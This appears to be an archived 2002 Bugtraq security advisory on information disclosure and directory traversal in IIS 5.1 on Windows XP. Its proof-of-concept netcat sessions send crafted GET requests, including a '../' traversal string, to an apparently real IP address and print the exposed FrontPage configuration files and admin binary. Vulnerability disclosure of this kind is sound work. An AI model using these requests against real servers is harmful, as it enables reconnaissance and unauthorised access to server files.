Bugtraq mailing list archives
This is the CORRECTED POST please ignore the one befor same subject MULTIPLE Remote Issues with II5.1 on Windows XP
From: "Adonis.No.Spam" <adonis1 () videotron ca>
Date: Sun, 10 Feb 2002 21:29:36 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
.---------------.
/ NtWaK0 Advisory \
+---------------------------------------------------------------------------
.
:
Affected : Windows XP with IIS 5.1
:
Type : MULTIPLE Remote Issues
:
Type : Remote/ Local Security Issues
:
Date : 10-02-2002
:
Author : NtWaK0 @ www.SafeHack.com
:
Credit : NtWaK0 @ www.SafeHack.com
:
+---------------------------------------------------------------------------
.
+--------------------.
Remote/Local Expoit \
+----------------------`----------------------------------------------------
.
:
+-----------. * * * www.SafeHack.com * * *
:
Disclaimer \
:
+-------------`-------------------------------------------------------------
.
:
This material is presented for informational and entertainment purposes
:
only, and to satisfy the curious. Any activities described in this file
:
which involve vandalism, theft, or any other illegal activities are
:
recounted from third-party conversations. I do not condone or encourage
:
vandalism or theft. I do not accept any liability for anything anyone
:
does with this information. So, don't shoot the messenger.
:
Remember: Use a computer in ways that ensure respect for your fellows.
:
:
+-------.
:
T.O.C. \
:
+---------`-----------------------------------------------------------------
.
:
:
[ Brief History . . . . . . . . . . . . . . . . . . . . . .line 40 ]
:
:
[ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 60 ]
:
:
[ The Solution . . . . . . . . . . . . . . . . . . . . . .line 156 ]
:
:
+-------------.
:
Brief History \
:
+---------------`-----------------------------------------------------------
.
I had the chance to play for couple of hours with IIS 5.1 on a friend Box,
:
thanks to Recon. While I was trying some stuff on IIS 5.1 I MANY problems
:
with default IIS 5.1 installation and on files installed by default.
:
:
This one is not the same as the one reported earlier. The one reported
:
before had to deal with "GET /_vti_bin/shtml.dll".
:
A copy of it can be found at :
:
http://www.safehack.com/Advisory/shtmldump.txt
:
:
+-------+
:
Test OS
:
+-------+
:
Tested on Windows XP with IIS 5.1
:
:
:
Please continue to read for more details.
:
:
+-----------.
:
The Problem \
:
+-------------`-------------------------------------------------------------
.
:
1- Issue <<<
: : Identify WEB DIR installation. By sending this "GET /_vti_pvt/access.cnf" : you can identify the web installation. As we all know this is a helpfull : peace of information if someone is going to attack your web site. : :
Proof-Of-Concept <<<
: C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /_vti_pvt/access.cnf : vti_encoding:SR|utf8-nl : RealmName:LAMER : InheritPermissions:false : PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt : : Their is another security issue with this too. "InheritPermissions:false" : This will tell security inheritance of that folder. : :
2- Issue <<<
:
Proof-Of-Concept <<<
: : C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /_vti_pvt/botinfs.cnf : : vti_encoding:SR|utf8-nl : D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\ : 40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar : :
3- Issue <<<
: :
Proof-Of-Concept <<<
: C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /_vti_pvt/bots.cnf : vti_encoding:SR|utf8-nl : vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared : \\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf : vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft : \\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar : \\\\fp4Avnb.dll : :
4- Issue <<<
: Using GET /iishelp/common/colegal.htm you can access other files. under the : web structure. I did not have chance to test it on file above the : web structure. Like I said I do not run IIS 5.1 but a friend does. : One of these days I am going to buy more memory for some of my old box and : slap on it IIS 5.1 to be able to do better test. : :
Proof-Of-Concept <<<
: C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf : vti_encoding:SR|utf8-nl : RealmName:LAMER : InheritPermissions:false : PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt : : writeto.cnf [Extracted From] : http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/ : prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp : : Back links for files that can be written to by users of the web, such as : Save Results Form handler result files. Files that can be written to by : users of the web have a looser security setting than regular web content. : : : C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll : MZÉ ? ? + @a ??¦? ¦ -!+?L-!This program cannot be run in DOS mode. : $ §-Q+Q¦?ïQ¦?ïQ¦?ï3¼,ïU¦?寮5ïT¦?ïQ¦>ïF¦?ïT¦9ïP¦?寮4ïS¦?寮;ïU¦?ïRichQ¦?ï : PE L?? _; a ?!??? ? 0 c? ? µg ? ? ? ? : P ? ¿- ? ? ? ? ? ? ? » (? P 0 P? : : : : C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 (?) open : GET /_vti_pvt/linkinfo.cnf : vti_encoding:SR|utf8-nl : javascript\:loadhelpfront();:localstart.asp : javascript\:activate(<%=iver%>);:localstart.asp : http\://www.safehack.com:index.htm : /iishelp/common/colegal.htm:localstart.asp : : : : NOTE: A search on google for "writeto.cnf" Returned alarmed results : http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta= : : : +------------. : The Solution \ : +--------------`------------------------------------------------------------ . No idea. Vendor was informed. : If you are going to use the founded issues, credit must be given to the : author. NtWaK0 @ www.safehack.com : +--------------------------------------------------------------------------- . -----BEGIN PGP SIGNATURE----- Version: PGP 7.1 iQA/AwUBPGcsA/PoW9fFNsN8EQJ3iwCfeLCNw3XWJS7c7bPG1pkqgM06ihEAoOdV w0aAHeJqCi7MoCs62m5AR8dm =u7kB -----END PGP SIGNATURE----- ________________________________________________________________________ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. ____________________________________________________________.___________ Live Well Do Good www.SafeHack.com | Je Pense, Donc Je Suis \(|)/ I know I ain't perfect, but i'm 99 point 9 percent :) --(")-- RFCs are meant to be read and followed :) /`\ NtWaK0 ________________________________________________________________________ Connect yourself to the main computer and let me take you to a cybernetic ride. Are you connected to the right cybernet? If you are, finally you are connected to my brain. ________________________________________________________________________ -=- Use a computer in a ways that ensure respect for your fellow -=-
Current thread:
- This is the CORRECTED POST please ignore the one befor same subject MULTIPLE Remote Issues with II5.1 on Windows XP Adonis.No.Spam (Feb 11)